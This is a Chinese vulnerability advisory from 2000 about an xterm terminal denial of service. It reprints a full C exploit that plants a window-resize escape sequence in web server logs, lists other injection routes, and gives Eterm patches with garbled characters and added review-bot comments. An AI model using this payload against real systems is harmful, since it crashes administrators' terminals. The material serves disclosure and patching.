Xterm存在拒绝服务攻击漏洞
漏洞发布时间:2000-6-5 11:19:00
漏 洞 描 述:
漏洞测试程序如下:
/*
*
* xterm Denial of Service Attack
* (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
*
* Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes
* rxvt v2.6.1 -- consumes all available memory and then
* crashes.
*
* Not vulnerable: KDE konsole 0.9.11
* Secure CRT 3.0.x
*
*
* By sending the VT control characters to resize a window it is possible
* to cause an xterm to crash and in some cases consume all available
* memory.
*
* This itself isn't much of a problem, except that remote users can inject
* these control characters into your xterm in numerous ways, including:
*
* o Directories and filenames on rogue FTP servers.
* o Rogue banner messages on ftp, telnet, mud daemons.
* o Log files (spoofed syslog messages, web server logs, ftp server logs)
*
* This sample exploit injects these control characters into a web get
* request. If an admin were to cat this log file, or happened to be doing
* a "tail -f access_log" at the time of attack they would find their
* xterm crash.
*
* Embedding "ESCAPE[4;65535;65535t" (where escape is the escape character)
* inside files, directories, etc will have the same effect as this code.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
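/* Socket for the single test request; kept at file scope as in the original. */
int sock;

/*
 * Sends one HTTP GET request to port 80 of the host given in argv[1].
 * The request path carries the VT window-resize sequence described in the
 * header comment, so the request line ends up in the web server's access log.
 * The sequence only has an effect when that log line is later displayed raw
 * in a terminal emulator that honours the resize request.
 *
 * Changes against the published listing: the mis-encoded '<' / '>' tokens
 * and the line-wrapped banner string are repaired so the file compiles,
 * the socket()/write() results are checked, the address structure is
 * zeroed, the resolved address length is bounded before copying, and main
 * returns a value on every path.
 *
 * Returns 0 when the request was written, -1 on a usage error or on any
 * resolution, socket, connect or write failure.
 */
int
main (int argc, char *argv[])
{
  /* Fixed request line; no formatting is involved, so no sprintf is needed. */
  static const char packet[] = "GET /\033[4;65535;65535t HTTP/1.0\n\n";
  struct hostent *he;
  struct sockaddr_in sa;

  fprintf (stderr, "[ http://www.rootshell.com/ ] - xterm DoS attack - 05/31/2000.\n\n");
  if (argc != 2)
    {
      fprintf (stderr, "usage: %s <host/ip>\n", argv[0]);
      return (-1);
    }

  sock = socket (AF_INET, SOCK_STREAM, 0);
  if (sock < 0)
    {
      fprintf (stderr, "Fatal Error: Cant create socket.\n");
      return (-1);
    }

  /* Zero the whole structure so sin_zero and padding are not stack garbage. */
  memset (&sa, 0, sizeof (sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons (80);

  he = gethostbyname (argv[1]);
  if (!he)
    {
      /* Not resolvable as a name: fall back to a dotted-quad literal. */
      if ((sa.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
        {
          close (sock);
          return (-1);
        }
    }
  else
    {
      /* Only copy an address that fits in sin_addr (IPv4). */
      if (he->h_length < 0 || (size_t) he->h_length > sizeof (sa.sin_addr))
        {
          close (sock);
          return (-1);
        }
      memcpy (&sa.sin_addr, he->h_addr_list[0], (size_t) he->h_length);
    }

  if (connect (sock, (struct sockaddr *) &sa, sizeof (sa)) < 0)
    {
      fprintf (stderr,
               "Fatal Error: Cant connect to web server.\n");
      close (sock);
      return (-1);
    }

  if (write (sock, packet, strlen (packet)) < 0)
    {
      fprintf (stderr, "Fatal Error: Cant write request.\n");
      close (sock);
      return (-1);
    }

  close (sock);
  fprintf (stderr, "Done.\n");
  return 0;
}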
解 决 方 法:
补丁程序Eterm-0.8.10-DoS.patch:
Index: src/command.c
===================================================================
RCS file: /cvs/enlightenment/Eterm/src/command.c,v
retrieving revision 1.1.1.1.2.7
diff -u -r1.1.1.1.2.7 command.c
--- src/command.c 1999/11/02 16:34:35 1.1.1.1.2.7
+++ src/command.c 2000/06/02 02:06:56
@@ -4694,6 +4694,9 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ if (x $#@62; scr-$#@62;width || y $#@62; scr-$#@62;height) {
+ return;
+ }
XResizeWindow(Xdisplay, TermWin.parent, x, y);
break;
case 5:
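Review bot: The added guard before `XResizeWindow` checks only the upper bound, so a zero value (or a negative one, if `x` and `y` are signed) taken from the escape sequence still reaches the X call; Xlib documents a BadValue error for a zero width or height. Consider `if (x < 1 || y < 1 || x > scr->width || y > scr->height) return;`. The same lower bound is missing in the second hunk of this patch and in both `UPPER_BOUND` hunks of the Eterm-0.9 patch to src/term.c. The declarations of `x`, `y` and `args` are outside the hunk, so their signedness needs confirming.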
@@ -4713,6 +4716,9 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ if (x $#@62; (scr-$#@62;width / TermWin.fwidth) || y $#@62; (scr-$#@62;height /
TermWin.fheight)) {
+ return;
+ }
XResizeWindow(Xdisplay, TermWin.parent,
Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_visible()?
scrollbar_total_width() : 0),
Height2Pixel(y) + 2 * TermWin.internalBorder + (menubar_visible()? menuBar_TotalHeight() :
0));
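Review bot: The cell-count limit `scr->width / TermWin.fwidth` is applied before `2 * TermWin.internalBorder` and the scrollbar and menubar sizes are added in the `XResizeWindow` call, so a request at the limit still produces a window somewhat larger than the screen. If the intent is never to exceed the screen, take the decorations off first, for example compare against `(scr->width - 2 * TermWin.internalBorder) / TermWin.fwidth`. This assumes `Width2Pixel` and `Height2Pixel` scale by the font cell size, which is not visible in the hunk. The same applies to the `UPPER_BOUND` lines in the second hunk of the Eterm-0.9 patch. A short comment such as `/* limit is the screen size in character cells */` above the check would make the units explicit.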
补丁程序Eterm-0.9-DoS.patch:
Index: src/term.c
===================================================================
RCS file: /cvs/enlightenment/Eterm/src/term.c,v
retrieving revision 1.33
diff -u -r1.33 term.c
--- src/term.c 2000/01/17 21:29:27 1.33
+++ src/term.c 2000/06/02 02:06:44
@@ -1232,6 +1232,8 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ UPPER_BOUND(y, scr-$#@62;height);
+ UPPER_BOUND(x, scr-$#@62;width);
XResizeWindow(Xdisplay, TermWin.parent, x, y);
#ifdef USE_XIM
xim_set_status_position();
@@ -1254,6 +1256,8 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ UPPER_BOUND(y, scr-$#@62;height / TermWin.fheight);
+ UPPER_BOUND(x, scr-$#@62;width / TermWin.fwidth);
XResizeWindow(Xdisplay, TermWin.parent,
Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_is_visible()?
scrollbar_trough_width() : 0),
Height2Pixel(y) + 2 * TermWin.internalBorder); |
 